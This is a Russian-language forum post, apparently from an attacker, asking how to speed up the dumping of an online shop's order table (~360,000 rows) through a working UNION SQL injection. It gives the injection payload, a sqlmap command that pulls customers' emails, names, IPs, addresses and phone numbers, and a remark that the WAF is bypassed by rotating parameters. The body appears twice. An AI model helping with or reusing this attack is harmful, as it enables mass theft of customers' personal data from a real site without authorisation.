Всем привет! Нашел серьезную UNION-инъекцию в одном проекте, но столкнулся с проблемой
скорости дампа огромной таблицы. Нужны советы по оптимизации.
Цель: Таблица oc_order в БД MySQL/MariaDB
Объем: ~360,000 строк
Текущий доступ: Рабочий UNION-пайлоад + sql-shell через sqlmap
Иньекция:
path=1_2' UNION ALL SELECT 4362,4362,CONCAT(0x716a786b71,...)-- -
WAF: CloudFlare или подобный, но пропускает запросы с ротацией параметров
Текущая скорость:
10 строк (12 столбцов): 35 секунд
10,000 строк: 7 часов 48 минут
Текущая рабочая коммада:
T oc_order \
-C "email,firstname,ip,lastname,payment_address_1,payment_address_2,payment_address_format,payment_firstname,payment_lastname,telephone,total,user_agent" \
--dump \
--batch \
--technique=U \
--threads=8 \
--delay=1 \
--hex \
--dump-format=CSV
Так вот, есть ли у вас идеи как можно ускорить этот процесс, или как то разом дампнуть 360к строк, например через Sql shell
скорости дампа огромной таблицы. Нужны советы по оптимизации.
Цель: Таблица oc_order в БД MySQL/MariaDB
Объем: ~360,000 строк
Текущий доступ: Рабочий UNION-пайлоад + sql-shell через sqlmap
Иньекция:
path=1_2' UNION ALL SELECT 4362,4362,CONCAT(0x716a786b71,...)-- -
WAF: CloudFlare или подобный, но пропускает запросы с ротацией параметров
Текущая скорость:
10 строк (12 столбцов): 35 секунд
10,000 строк: 7 часов 48 минут
Текущая рабочая коммада:
T oc_order \
-C "email,firstname,ip,lastname,payment_address_1,payment_address_2,payment_address_format,payment_firstname,payment_lastname,telephone,total,user_agent" \
--dump \
--batch \
--technique=U \
--threads=8 \
--delay=1 \
--hex \
--dump-format=CSV
Так вот, есть ли у вас идеи как можно ускорить этот процесс, или как то разом дампнуть 360к строк, например через Sql shell